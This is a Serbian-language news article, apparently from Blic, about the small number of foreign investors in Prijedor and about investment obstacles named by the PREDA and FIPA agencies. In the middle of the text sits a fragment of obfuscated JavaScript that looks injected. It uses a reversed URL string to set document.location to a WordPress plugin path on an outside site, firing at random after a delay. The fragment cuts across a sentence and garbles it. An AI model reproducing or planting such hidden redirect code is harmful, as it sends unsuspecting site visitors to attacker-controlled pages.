Nema preduzetnika koji bi otvorili velike pogone u Prijedoru

Na području grada Prijedora ima 14 investitora iz Austrije, Norveške, Švajcarske, Italije, Hrvatske i Srbije sa udelom stranog kapitala.

U Agenciji za ekonomski razvoj Prijedora (PREDA) kažu da se strani investitori pretežno bave prerađivačkom industrijom, kao što su rudarstvo, prehrambena, drvna i metalska industrija.

Koordinator Centra Bojan Jojić kaže da su to većinom pogoni sa nekoliko desetina zaposlenih, osim rudnika „Arselor Mitala“, i da je problem što nema novih investitora koji bi zaposlili preko 100 radnika.

– Ono što privlači investitore su jeftiniji troškovi poslovanja, kao što su zemljište, obaveze za režije, ali i radna snaga – kaže Jojić. Dodaje da ih računica troškova privlači, međutim politička klima ih odbija i na duže vreme blokira ulaganja ili proširenje proizvodnje.

– Naša ponuda za strane ulagače je solidna, jer treba da znamo da imamo konkurenciju svih zemalja u okruženju. Kada dolaze stranci oni ih sve obilaze, ali ključ svega je politika koja bi trebalo da napravi pozitivan okvir za poslovanje, umesto toga često se čuju izjave vodećih političara u kojima se spominje rat zbog čega odlaze u susedne zemlje – ističe Jojić.

Info centar je obično prvo mesto na koje dolaze kada se raspituju za poslovni sistem.

–Najčešće pitaju gde da pokrenu biznis, kakve su njihove obaveze prema lokalnoj zajednici i državi. Često i oni koji već imaju ovde pogone pomoć traže pri proširenju proizvodnje – tvrdi on i dodaje da Info centar po zahtevu investitora, odradi i registraciju novog preduzeća.

– Oni pripremaju dokumentaciju, a mi ih zastupamo pred svim institucijama i odradimo posao za njih, potrebno je oko mesec i po dana da se završi registracija, jer preduzetnici dugo čekaju za dobijanje poreskog broja – naglašava Jojić. Navodi i da novi investitori proveravaju i da li se u RS školuju kadrovi koji su im potrebni za proizvodnju.

– Često organizujemo susrete zainteresovanih ulagača sa onima koji su već pokrenuli proizvodnju ovde, kako bi oni razmenili svoja iskustva, povezujemo ih i sa trgovinskim predstavništvima koja pojedine zemlje imaju u BiH, kao što su Nemačka i Austrija – priča Jojić. Dodaje da u grad na Sani dolaze investitori po preporuci Prijedorčana koji žive u stranim zemljama.

Iz Agencije za tog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unapređenje stranih investicija u BiH (FIPA) saopštili su za „EuroBlic“ da su neiskorišteni privredni kapaciteti čest primer na prostoru čitave BiH.

– Najčešći razlog su nerešeni imovinsko – pravni odnosi, a u takvim slučajevima strani investitori uglavnom nisu zainteresovani za ulaganja. Treba više verovati stranim investitorima – kažu iz FIPA. Zaključuju da je pored rešenih vlasničkih odnosa, za uspešne investicije neophodna i spremnost svih nivoa vlasti da brzo i efikasno odgovori na eventualne zahteve stranih investitora.

Celpak čeka investitore

Zemljište industrijske zone „Celpak“ u Prijedoru, na prostoru nekadašnje istomimene fabrike celuloze, godinama se nudi investitorima. Sa uređenom infrastrukturom prodaje se za 10 KM po metru kvadratnom.

Trenutno su tu dva investititora, dok je u ponudi još oko šest hektara zemljišta. Pored njih, na većem delu od četiri hektara iskorištenog zemljišta, gradska „Toplana“ izgradila je nove pogone za grejanje na biomasu. Iako i domaći preduzetnici pokreću prizvodnju, oni ne poseduju kapital za pokretanje većih pogona.

Blic

Pogrebni prevoz Iris Lim Profi Prijedor Panta rhei Prijedor

You must be logged in to post a comment Login